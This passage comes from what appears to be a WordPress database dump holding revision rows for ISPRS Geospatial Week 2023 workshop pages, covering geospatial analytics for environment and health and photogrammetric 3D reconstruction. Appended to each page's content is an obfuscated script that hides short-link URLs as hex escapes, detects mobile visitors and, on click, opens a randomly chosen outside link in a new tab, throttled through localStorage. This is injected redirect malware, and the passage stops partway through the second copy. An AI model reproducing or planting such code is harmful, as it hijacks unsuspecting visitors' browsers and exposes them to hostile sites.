geospatial technology is essential for effective management of environment. In general, we consider  remote sensing data due its variety, veracity, volume and velocity  is effective tool for addressing the unique challenges. These data are being made available for analysis from traditional systems such as high-resolution imaging sensors as well as innovative sources like mobile location data, social media, sensors from Internet-of-Things devices and crowdsourcing. So this is one challenge thrown to potential authors to address in their presentation.</p>\n<p>&nbsp;</p>\n<p>II.Next challenge to be addressed by authors is on explanation related tp how much do the vegetation, climate, water cycle, and land formations which are all defined as physical geography, affect the society?  People interact with their physical environment through the air they breathe, the water they drink, the houses they live in, and the transportation they access to travel to work and school.</p>\n<p>&nbsp;</p>\n<p>III.The third one is on how can we create indicators derived from satellite data for assessing land use changes, urbanization, air and water quality and land degradation? They have an influence on natural resources management as well as the occurrence of various diseases, vector borne diseases, pulmonary diseases, food and waterborne diseases or non-communicable diseases.</p>\n<p>&nbsp;</p>\n<p>IV.What is the current geospatial research for environmental management, air, water pollution and land degradation mapping, disease mapping, Health services, and geospatial epidemiology that could be operationalized through possible pivoting and scaling for appropriate interventions by the authorities?</p>\n<p>&nbsp;</p>\n<p>V.The fifth challenge is about Remote sensing application to assessment of air quality and air pollution, atmospheric aerosols, atmospheric composition, and evaluating its synergism with other data sets, including constraining greenhouse gases evolution and exchange processes</p>\n<p>&nbsp;</p>\n<p>VI.Disaster management is a great challenge and state-of-the-art Geospatial and GeoAI techniques application is emerging as a powerful tool. Here authors may address the challenges related to Geospatial Infrastructure Management Ecosystem (GeoIME), cloud-web-application including AI tools, early warning systems, monitoring, preparedness, data analytics, and algorithms for human detection from earth observations and UAVs/MAVs images etc.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><u>Supporting ISPRS Working Groups:</u></h5>\n<ul>\n<li>The workshop is proposed by WG III/ 9 Geospatial Environment and Health Analytics</li>\n<li>WG III/6 on Remote sensing of the Atmosphere and ICWG III/IVa on Disaster Management</li>\n</ul>\n<p>are the supporting working groups.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><u>Scientific Committee:</u></h5>\n<ul>\n<li>Peng Yue, Wuhan University, PR China</li>\n<li><strong> Weilian Li, </strong>University of Bonn, Germany</li>\n<li>Dr Suchita Gopal, Boston University. USA</li>\n<li>Dr Mahbooba Nasreen, University of Dacca, Bangladesh</li>\n<li>Dr Fazlay Faruq, University of Mississippi USA</li>\n<li>Dr Murthy Remella, Indian Space Research Organization, India</li>\n<li>Dr Nitin Kumar Tripathi, Asian institute of Technology, Thailand</li>\n<li><strong>Dr Nelly Lucero Ramírez Serrato, </strong>National Autonomous University of Mexico, Mexico</li>\n<li>Dr Valli Manickam, Administrative Staff College of India, India</li>\n</ul>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><u><strong>Special Issue dedicated to the workshop:</strong> </u></h5>\n<p>The authors of selected papers will be invited to submit extended versions of their papers to the –Journal of Photogrammetry, Remote Sensing and Geoinformation Science. The papers can be reviewed as per the current practices of ISPRS. (<a href=\"https://www.springer.com/journal/41064\">https://www.springer.com/journal/41064)</a>.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Geospatial Data Analytics for Physical Geography Impact Assessment on Environment, Health and Society</strong>','','inherit','closed','closed','','3427-revision-v1','','','2023-02-05 14:36:01','2023-02-05 14:36:01','',3427,'https://gsw2023.com/?p=3838',0,'revision','',0),
(3839,1,'2023-02-05 14:37:15','2023-02-05 14:37:15','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Photogrammetric 3D Reconstruction for Geo-Applications (PhotoGA 2023)</strong></span></h5>\n<p>&nbsp;</p>\n<h5></h5>\n<h5 style=\"text-align: justify;\">This workshop focuses on algorithms and approaches for photogrammetric 3D reconstruction in the context of geospatial applications. The workshop addresses experts from photogrammetry, remote sensing, and computer vision fields in both academia and industry. Contributions are invited from all researchers and practitioners to cover the following core topics: models and methods for image orientation, multi-source data alignment and fusion, 3D data acquisition and surface reconstruction, image sequence analysis, multi-view geometry, and structure-from-motion (SfM) for data acquired from terrestrial, drone, airborne and spaceborne platforms, as well as the geo-applications of these methods.</h5>\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3465\" img_size=\"1200x1000\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: left;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"63\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5></h5>\n<h5></h5>\n<h5><u>Themes of event:</u></h5>\n<ul>\n<li>\n<h6>Novel approaches to image orientation</h6>\n</li>\n<li>\n<h6>Orientation of unconventional images such as oblique images, images from cameras with rolling shutter, RGBD images, crowd-sourced images, historical images, and thermal infrared images</h6>\n</li>\n<li>\n<h6>Multimodal image matching for alignment, registration and fusion of multi-source imagery, e.g. optical and radar images</h6>\n</li>\n<li>\n<h6>Geometric, algebraic and learning-based approaches to multi-view stereo and structure-from-motion (SfM)</h6>\n</li>\n<li>\n<h6>Modern approaches in image orientation and bundle adjustment (BA), e.g. single-image calibration, online calibration, methods for handling ambiguous and degenerate configurations, large-scale BA, and structureless BA</h6>\n</li>\n<li>\n<h6>3D mapping and monitoring applications with focus on photogrammetric aspects, such as precision agriculture, forest inventory, structural health monitoring, traffic surveillance, disaster readiness and response, etc.</h6>\n</li>\n</ul>\n<p>&nbsp;</p>\n<h5><u>Scientific Committee:</u></h5>\n<ul>\n<li>\n<h6>Ronny Hänsch, Germany</h6>\n</li>\n<li>\n<h6>Mozhdeh Shahbazi, Canada</h6>\n</li>\n<li>\n<h6>Ewelina Rupnik, France</h6>\n</li>\n<li>\n<h6>Petra Helmholz, Australia</h6>\n</li>\n<li>\n<h6>Jianzhu Huai, China</h6>\n</li>\n<li>\n<h6>Michael Schmitt, Germany</h6>\n</li>\n<li>\n<h6>Dimitri Bulatov, Germany</h6>\n</li>\n<li>\n<h6>Saeid Homayouni, Canada</h6>\n</li>\n<li>\n<h6>David Belton, Australia</h6>\n</li>\n<li>\n<h6>Ahmed Shaker, Canada</h6>\n</li>\n<li>\n<h6>Gunho Sohn, Canada</h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 